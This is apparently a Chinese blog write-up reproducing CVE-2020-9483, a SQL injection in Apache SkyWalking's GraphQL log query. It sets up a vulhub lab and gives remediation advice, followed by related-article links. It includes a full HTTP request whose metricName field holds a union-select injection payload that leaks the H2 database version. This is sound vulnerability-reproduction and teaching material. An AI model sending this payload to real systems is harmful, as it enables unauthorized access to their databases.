漏洞信息

漏洞名称
ApacheSkyWalking SQL注入漏洞
漏洞编号
CVE-2020-9483
危害等级
高危
漏洞类型
通用型漏洞
漏洞厂商
Apache
漏洞概述
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时，通过GraphQL协议查询元数据时，存在SQL注入漏洞，该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

先在kali安装docker-compose
然后下载靶场vulhub:
docker-compose up -d
生成靶场环境：
访问8080端口：

环境搭建完成。

漏洞复现

利用burpsuite抓包：
BP抓包，利用报错注入获取版本

POST /graphql HTTP/1.1
Host: 192.168.18.149:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 610
Origin: http://192.168.18.149:8080
Connection: close
Referer: http://192.168.18.149:8080/
{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}

成功返回h2数据库版本信息！

修复建议

1、升级Apache Skywalking 到最新的 v8.4.0 版本。
2、将默认h2数据库替换为其它支持的数据库。

（CVE-2020-9483）ApacheSkyWalking SQL注入 漏洞复现相关推荐

1. kkcms前台sql注入漏洞复现

   kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...

2. espcms5.7.13 sql注入漏洞复现

   espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

3. 通达OA 11.5 SQL注入漏洞复现

   0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

4. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

   漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

5. 宏景eHR SQL注入漏洞复现（CNVD-2023-08743）

   0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...

6. 畅捷通T+ SQL注入漏洞复现（QVD-2023-13612）

   0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...

7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

   文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

8. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

   1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

9. 泛微E-Cology SQL注入漏洞复现（QVD-2023-15672）

   0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...

最新文章

1. js中父窗口获得模态窗口的返回值
2. linux之service命令
3. php pdo-insert,php mysql pdo insert multiple rows 批量插入
4. linux shell脚本中 if 条件判断
5. Java+jquery+jsonp实现跨域
6. java 结合groovy,Groovy教程:Groovy和Java的相互调用及简单对比
7. CentOS安装Mingw32
8. SCS【1】今天开启单细胞之旅，述说单细胞测序的前世今生
9. 在iphone机型上，input实时中文搜索时，拼音会不断触发onchange的解决方案
10. 史上最大入行软件测试月收入1万以上“骗局”来啦，防踩坑日记
11. 计算机网络与Internet发展历史
12. 转载－－12306刷票记
13. Cisco WAN的概念考试答案
14. 冰镇西瓜文案：冰镇西瓜水果文案大全集，水果类冰镇西瓜推销文案
15. 前端js实现文字自动转拼音方法
16. 太原学院汾东校区计算机,太原学院汾东校区试运行寝室限电
17. oracle商品当日销售排行,Oracle零售 (Retek)品类管理.ppt
18. 如何更改Code::Blocks背景颜色（懒人版）
19. 前端开发：a标签的使用
20. 技术人员必会英语单词

热门文章

1. tensorflow feature_columns
2. Tutorial-bash
3. TypeError: Cannot handle this data type: (1, 1, 28), |u1
4. python3.7 ''' '''注释里添加\u \U \N就会报错的bug
5. H3C交换机开启SNMP
6. 电脑文件恢复怎么操作？永久删除文件的恢复教程
7. 单例设计模式中懒汉式和饿汉式的区别？
8. java游戏英雄_【技巧攻略】教你用JAVA来玩《百万英雄》答题~
9. 物联网课程设计：环境监测系统设计与实现
10. 在“He3 Minecraft”中自由发挥打造专属工具